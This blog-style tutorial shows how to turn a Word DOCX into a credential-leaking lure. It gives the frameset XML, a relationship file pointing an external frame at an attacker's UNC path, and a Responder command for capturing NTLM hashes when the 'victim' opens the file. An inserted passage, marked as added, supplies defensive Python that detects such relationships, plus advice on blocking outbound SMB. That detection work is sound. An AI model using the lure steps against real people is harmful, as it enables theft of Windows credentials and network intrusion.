Leaking Windows Credentials via Microsoft Office Document

This blog post is based on “Tradecraft Security Weekly Talk EP 21” given by @dafthack and @ustayready from Black Hills Information Security.

A Microsoft Word “DOCX” file is a ZIP archive of XML files. These XML files control the theme, fonts and web settings of the document. Historically, Word was also used as an HTML editor. We will add framesets to a Microsoft Word document and set a UNC path to leak Windows credentials.

We start by creating an empty Word document (just type a space and save the file) and opening it with the 7-Zip archiver. Inside the archive, we go into the ‘word’ folder; the file of interest is ‘webSettings.xml’. We copy this file locally and add the framesets as in the snippet below:

    <w:frameset>
      <w:framesetSplitbar>
        <w:w w:val="60"/>
        <w:color w:val="auto"/>
        <w:noBorder/>
      </w:framesetSplitbar>
      <w:frameset>
        <w:frame>
          <w:name w:val="3"/>
          <w:sourceFileName r:id="rId1"/>
          <w:linkedToFile/>
        </w:frame>
      </w:frameset>
    </w:frameset>

This creates a link to a file inside the ‘_rels’ folder. Now go into the ‘_rels’ folder, copy the available file locally and add the relationship. We rename the file to ‘webSettings.xml.rels’ and add it back to the archive. The relationship snippet is given below:

 
    <?xml version="1.0" encoding="UTF-8" standalone="yes"?>
    <Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
      <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/frame" Target="\\10.10.10.3\Microsoft_Office_Updates for windows 7/8/10" TargetMode="External"/>
    </Relationships>

The ‘webSettings.xml.rels’ file holds the relationship Id value (rId1), the UNC path as the Target, and the TargetMode, which says whether the target is external or internal.
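The three fields described above are also what a defender can check for. The following is an added example, not code from the original post or the talk: it scans every relationship part in a DOCX for external targets that are frames or point at a UNC/file path. The function names and the sample inputs (including the 192.0.2.10 documentation address) are constructed for illustration.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"
FRAME_TYPE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/frame"
HYPERLINK_TYPE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"
# UNC (\\host\share or //host/share) and file: targets can trigger SMB authentication
REMOTE_SMB = re.compile(r"^(\\\\|//|file:)", re.IGNORECASE)

def find_external_relationships(docx_bytes):
    """Return one finding per external relationship that is a frame or targets SMB."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as archive:
        for part in archive.namelist():
            if not part.endswith(".rels"):
                continue
            # For untrusted mail attachments, a hardened parser (e.g. defusedxml) is preferable
            root = ET.fromstring(archive.read(part))
            for rel in root.iter(REL_NS + "Relationship"):
                if rel.get("TargetMode", "Internal").lower() != "external":
                    continue
                target = rel.get("Target", "")
                reasons = []
                if rel.get("Type") == FRAME_TYPE:
                    reasons.append("external frame")
                if REMOTE_SMB.match(target):
                    reasons.append("UNC/file target")
                if reasons:
                    findings.append({"part": part, "id": rel.get("Id"),
                                     "target": target, "reasons": reasons})
    return findings

def build_sample(rels_xml):
    """Constructed test input: a minimal ZIP holding only the relationship part."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as archive:
        archive.writestr("word/_rels/webSettings.xml.rels", rels_xml)
    return buf.getvalue()

RELS = ('<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
        '<Relationship Id="rId1" Type="{t}" Target="{target}" TargetMode="{mode}"/></Relationships>')
# Constructed samples: one frame pointing at a UNC path, one ordinary web hyperlink
FLAGGED = build_sample(RELS.format(t=FRAME_TYPE, target=r"\\192.0.2.10\share", mode="External"))
BENIGN = build_sample(RELS.format(t=HYPERLINK_TYPE, target="https://example.com/", mode="External"))

if __name__ == "__main__":
    print(find_external_relationships(FLAGGED), find_external_relationships(BENIGN))
```

Documents that produce findings can be quarantined at the mail gateway. Blocking outbound SMB (TCP 445) at the network perimeter keeps the hash from leaving the network even if such a document is opened.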

We are now ready to send the weaponized Word document to the victim.

On the other side, we start Responder on the Kali machine to listen for NTLM hashes:

 
Responder -I eth0 -e 10.10.10.3 -b -A -v

The moment the victim opens the Word document, it connects to the UNC path given in the relationship file (screenshot below).

[Screenshot: Connection_UNC]

I have also created a video which shows the Windows credential leakage.

 

 

 
